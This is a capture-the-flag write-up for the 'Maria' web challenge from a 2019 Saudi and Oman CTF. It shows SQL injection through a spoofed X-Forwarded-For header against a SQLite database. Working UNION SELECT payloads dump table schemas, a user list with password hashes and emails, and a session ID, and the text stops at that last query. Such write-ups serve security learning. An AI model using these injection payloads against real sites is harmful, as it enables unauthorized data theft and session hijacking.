[Saudi and Oman National Cyber Security CTF 2019] [Web] Maria WriteUp

Hello,

I’m about to share a WebSecurity WriteUp

Let’s Open the link and see what we have …

In this Challenge there is two hints:

1. The website store our IP address in database

2. Maria is the only person that can reveal the flag

The Source Code:

SELECT * FROM nxf8_sessions where ip_address = ‘*.*.*.*

We send that to BurpSuite

Let’s Try to change our IP Address from headers via BurpSuite ….

X-Forwarded-For: 127.0.0.1

IP Changed

let’s see if there is possibilities of any SQL injection ….

let’s reduce the number of columns to avoid the error message

So we have a SQLi …. (I can’t explain more those are basics as we know Just follow the pics …)

We are dealing with SQLite here

I found two tables:

nxf8_sessions
nxf8_users

Let’s grab columns via an easy method

X-Forwarded-For: 127.0.0.1' UNION SELECT 1,2,3,sql FROM sqlite_master WHERE type =’table’ AND name = ‘nxf8_sessions’ LIMIT 0,1 — -

And for users

X-Forwarded-For: 127.0.0.1' UNION SELECT 1,2,3,sql FROM sqlite_master WHERE type =’table’ AND name = ‘nxf8_users’ LIMIT 0,1 — -

From users I found that Maria ID is : 5

ID:
1,2,3,4,5,6,7,8
Name:
Alex,Trevor,Jacob,Paul,Maria,Mira,Michael,Joshua
Password:
f7af8e099d32a7d4de771c47d7d21000eb073c77,b6d435bbaa57016efe1f67b11f88fb47a459180a,7a19fdecb23571ed265321c9f764e6a6f81f3373,20af2164daf4bfaa73d89229782b8f01686584fe,d3e1330bac4810f24a5cd3d5a0e5a74e5d4c05c2,2f7a7814f81e84ecc4d73e8fd245fa603065632a,b19213f749af5e451d5f7ee4be0147294eea1709,506f329f5e6f5b456900b9f5ef6a308890d52cfc
Email:
alex@noweb.org,trevor@noweb.org,jacob@noweb.org,paul@noweb.org,maria@noweb.org,mira@noweb.org,michael@noweb.org,joshua@noweb.org

And in our challenge there is no login pages or anything let us to get the flag and its required to use Maria as an user ….

I tried to crack the password but nothing and after a while I get back to our “nxf8_sessions” Table

X-Forwarded-For: 127.0.0.1' UNION SELECT 1,2,3,session_id FROM nxf8_sessions WHERE user_id =5 LIMIT 0,1 — -